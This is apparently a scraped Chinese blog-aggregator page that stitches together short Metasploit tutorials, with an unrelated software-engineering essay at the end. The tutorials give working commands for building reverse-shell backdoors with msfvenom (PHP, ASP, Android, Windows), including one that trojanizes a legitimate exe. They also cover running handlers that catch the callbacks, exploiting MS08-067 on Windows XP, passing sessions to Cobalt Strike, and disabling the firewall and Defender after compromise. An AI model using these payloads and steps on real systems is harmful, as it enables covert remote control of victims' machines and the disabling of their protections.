msf

metasploit与Cobaltstrike互相派生shell

我们两清 提交于 2020-02-23 11:22:08
https://www.cnblogs.com/test404/p/10599981.html msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) msf exploit(handler) > use exploit/windows/local/payload_inject   msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http   msf exploit(payload_inject) > set DisablePayloadHandler true   msf exploit(payload_inject) > set LHOST 192.168.229.143   msf exploit(payload_inject) > set LPORT 1212   msf exploit(payload_inject) > set SESSION 1   msf exploit(payload_inject) > exploit Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) msf > use exploit/multi/handler msf exploit(handler) > set

msf建立php反弹shell

眉间皱痕 提交于 2020-02-19 13:45:25
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下asp反弹木马: root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp 二 监听端口建立会话 1 使用handler模块 msf > use exploit/multi/handler 2 设置payload msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows) PAYLOAD =>php/meterpreter/reverse_tcp 3 设置监听主机 msfexploit(multi/handler) > set LHOST 192.168.88.155 LHOST =>192.168.88.155 4 设置监听端口(默认4444) msfexploit(multi/handler) > set LPORT 4444

msf自动连接postgresql配置

时光毁灭记忆、已成空白 提交于 2020-02-16 16:10:45
今天做了一下msf连接数据库的配置,中间碰到了一些坑点这里就不详细叙述了,开始正确的操作方式。 首先对postgresql进行配置以方便连接。 root@kali:~# service postgresql start #启动数据库 root@kali:~# su postgres #设置用户与数据库 postgres@kali:/root$ createuser msf -P Enter password for new role: Enter it again: postgres@kali:/root$ createdb --owner=msf4 msf postgres@kali:/root$ exit exit root@kali:~# root@kali:~# msfconsole #测试数据库连接状态 ### ### msf > db_connect msf:password@localhost/msf [*] Rebuilding the module cache in the background... msf > db_status [*] postgresql connected to msf msf > search 2015-0531 [!] Module database cache not built yet, using slow search

MSF初体验—入侵安卓手机

血红的双手。 提交于 2020-02-16 07:20:40
1.生成apk程序 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk 2.启动msfconsole 3.启动use exploit/multi/handler模块 4.set payload android/meterpreter/reverse_tcp 5.show options 6.准备工作 msf exploit(handler) > set LHOST 192.168.1.101 LHOST => 192.168.1.101 msf exploit(handler) > set LPORT 5555 LPORT => 5555 msf exploit(handler) > exploit(运行apk程序) [*] Started reverse TCP handler on 192.168.1.101:5555 [*] Starting the payload handler... [*] Sending stage (63194 bytes) to 192.168.1.105 [*] Meterpreter session 1 opened (192.168.1.101:5555 -> 192.168.1.105:57629) at 2017-06

msf学习笔记1.入侵WindowsXP系统

倖福魔咒の 提交于 2020-02-11 07:22:11
这几天看了几篇msf内网渗透,shadon入侵摄像头,入侵安卓机的文章,觉得msf确实是一款利器。有人说msf的出现让任何人都可以成为黑客,因此打算这几天学习一下。 在kail中自带了msf msf一般会和nmap搭配使用 nmap扫描开放端口,ip地址等基本信息。然后msf设置荷载。 windows xp sp3远程控制 启动msf,在这个msf里已经存在了这个漏洞的样本,可以拿来直接用,远程执行的代号是08-067 搜索到了这个漏洞完整的路径之后,就要使用这个exploit show option查看我们哪些项需要配置 这里的这个RHOSTS就是我们的目标机,靶机也就是要攻击的这个Windows2003的ip地址,在Windows直接cmd ipconfig就可以才看到ip 直接set RHOSTS ip 那个445端口是默认的,我们不用管,直接用这个445端口就可以。 之后选择攻击荷载(payload) show payload 之后会弹出很很多攻击荷载的样本 所有的荷载加起来差不多100多个,选择最常用的那个,当然这些各有不同,功能也完全不同。 靶机的一些参数已经设置成功了,现在需要设置攻击机了,我这里也就是kail 都设置好后需要找一个对应靶机相应版本的payload MSF> info查看对应版本 我这里用的是XP SP3 找到对应版本设置 set target 34

msf生成windows后门程序

扶醉桌前 提交于 2020-02-05 01:28:01
进入文件夹,我们先要把我们需要制作后门程序的正常exe文件拖进去 在此处打开终端,确保该路径存在这个exe文件! 输入命令 msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x Browser.exe -f exe -o /root/project/Browser.exe -a:用于指定架构 –platform用于指定平台 -p用于指定payload LHOST处填写自己kali的地址 LPORT指定端口 -b指去除坏字符 -e是指定编码器 -i是加码 -x是指定本目录下我们的无毒原文件 -f指定输出格式 -o指定导出路径以及文件名称 在指定路径下就可以看到我们生成的文件 然后把该文件扔给window7但先不运行 回到kali打开msfconsole 设置启用handler模块,设置ip等一系列操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.53 set LPORT 4444 exploit 7.

软件工程阅读作业感想

自闭症网瘾萝莉.ら 提交于 2020-02-03 06:35:11
软件工程老师给我们留了阅读作业,刚开始觉得老师留的作业阅读量太大,而且时间太短,对此感到不是很理解,但是当我开始阅读《移山之道》这本书的时候,感觉这本书真的写的很通俗易懂,利用移山软件公司人员开发经营石头销售的软件的故事贯穿整本书,使我们很清楚的理解每个环节的顺序和重要性,同时也给我们实例展示了怎么开发项目。通过这本书的阅读,我意识到以下几个问题,这都是以前我的误区和不曾想到的事情。 1,软件开发的工具和方法十分重要。想要做出高质量高水平的软件并不是团队中只要有高超的编程能力和熟练地技巧就能完成的。一个软件开发团队需要一系列的管理工具,协作工具,软件构建工具,以及能保证软件质量的测试工具。软件开发的方法很多,每种方法都有着各自的使用原则,虽然说瀑布模型和螺旋模型已经过时的,但是依然有着各自的优势,不能被忽略。 2,软件开发过程不同角色的成员有着不同的作用。刚开始接触的时候,总觉得会编程的就是牛人,个人技术好的就能够独当一面,通过这次阅读,扭转了我的这种想法。PM虽然听起来好像级别高,其实和团队中的每个人都是一样的,只是工作不同;DEV看似是软件工程的核心,没有好的DEV就无法完成代码编程,无法实现高超的功能,也就没法完成软件开发,但是DEV并不是万能的,如果没有PM的需求规划,项目管理,没有好的测试人员寻找小强,就无法完善自己的程序,无法开发出满足顾客需求的软件

内网渗透之权限维持 - MSF

走远了吗. 提交于 2020-02-02 02:45:58
年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名 linux示例 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell windows示例 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe 远控流程 连接后门 1.制作后门上传到目标机并运行 详见上一条 2.开启msf并进入handle模块 use exploit/multi/handler 3.设置payload类型(必须与第一步一致) set payload payload名字 4.设置lhost和lport(与第一步生成的后门一致) set lhost 监听ip set lport 监听端口 5.options查看配置是否正确 6

《构建之法——现代软件工程》读书笔记(二)

不问归期 提交于 2020-01-31 19:29:48
1.实战中的软件工程——MSF的原则,MSF团队模型和开发模式,CargoCult。 MSF是什么呢?在前面的章节中讲了很多方法论和宣言,但这里介绍的是微软的一个宣言(Microsoft Solution Framework),MSF有着九个基本原则:推动信息共享与沟通;为共同的远景而工作;充分授权和信任;各司其职,对项目共同负责;交付增量的价值;保持敏捷,预期和适应变化;投资质量;学习所有的经验;与顾客合作。下面对这些原则依次进行了介绍和理解。 首先是推动共享与沟通 。就是所有信息都保留且公开,也就是把所有的信息都共享,都用来沟通。这个原则的好处是能够让整个项目的开发流程更加的具备合理性和逻辑性。这样在管理这个项目时就更加简单了。 第二点,为共同的远景而工作 。其实就是大家一个团队的,力要往一处使,不能说每个人各做各的,到最后谁也好不了。要明白整个项目其实就是每个人的合作组成的。也就是统一思想,上下一条心。 第三点,充分授权和信任 。这一点的关键是授权。也就是每个成员都要有自己的授权,他们在有权在职权范围内完成任务。这个原则其实际是MSF模式的核心之一,团队之间要平等协作,并且各个成员之间得到充分的授权。这样的话,每个人都会负担起自己应该负担的责任,并且有足够的权利去做好自己分内的任务。 第四点,各司其职,对项目共同负责 。这点其实和第三点有着一些相似之处

【主机渗透】后渗透利用msf关闭防火墙

别等时光非礼了梦想. 提交于 2020-01-30 03:05:33
运行环境: kali工具msf ip:192.168.2.136 windows server2008 ip:192.168.2.132 已经拿到目标服务器权限,开始后渗透 是administrator权限,为了后渗透方便我们需要把目标的服务器的杀毒,防火墙,以及一些防护软件给关闭了。 目标服务器防火墙开着,我们要使用我们得到的shell给它关闭 关闭windows防火墙需要管理员或system权限 我们使用上边netsh advfirewall set allprofiles state off命令来关闭 再看下服务器 然后再关闭windefebd服务 命令 net stop windefend 来源: CSDN 作者: JohelLiang 链接: https://blog.csdn.net/qq_34965596/article/details/104081425